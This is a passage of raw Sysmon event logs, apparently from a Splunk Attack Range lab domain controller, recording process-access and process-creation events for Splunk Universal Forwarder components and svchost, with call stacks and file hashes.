16:48:36.906{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179878Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.906{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179877Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.906{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D3E4-601A-2C30-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179876Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.906{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D3E4-601A-2C30-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179875Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.907{29E67E80-D3E4-601A-2C30-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179874Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.391{29E67E80-D3E4-601A-2B30-00000000A301}11046244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179873Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.234{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D3E4-601A-2B30-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179872Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.234{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179871Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.234{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179870Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.234{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179869Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.234{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179868Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.234{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D3E4-601A-2B30-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179867Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.234{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D3E4-601A-2B30-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179866Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.235{29E67E80-D3E4-601A-2B30-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179891Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.578{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D3E5-601A-2D30-00000000A301}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179890Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.578{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179889Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.578{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179888Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.578{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179887Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.578{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179886Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.578{29E67E80-7CBD-6019-0500-00000000A301}640756C:\Windows\system32\csrss.exe{29E67E80-D3E5-601A-2D30-00000000A301}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179885Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.578{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D3E5-601A-2D30-00000000A301}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179884Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.579{29E67E80-D3E5-601A-2D30-00000000A301}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179883Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:37.062{29E67E80-D3E4-601A-2C30-00000000A301}46885528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179908Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.922{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D3E6-601A-2F30-00000000A301}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179907Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.922{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179906Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.922{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179905Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.922{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179904Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.922{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179903Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.922{29E67E80-7CBD-6019-0500-00000000A301}6402196C:\Windows\system32\csrss.exe{29E67E80-D3E6-601A-2F30-00000000A301}5024C:\Program 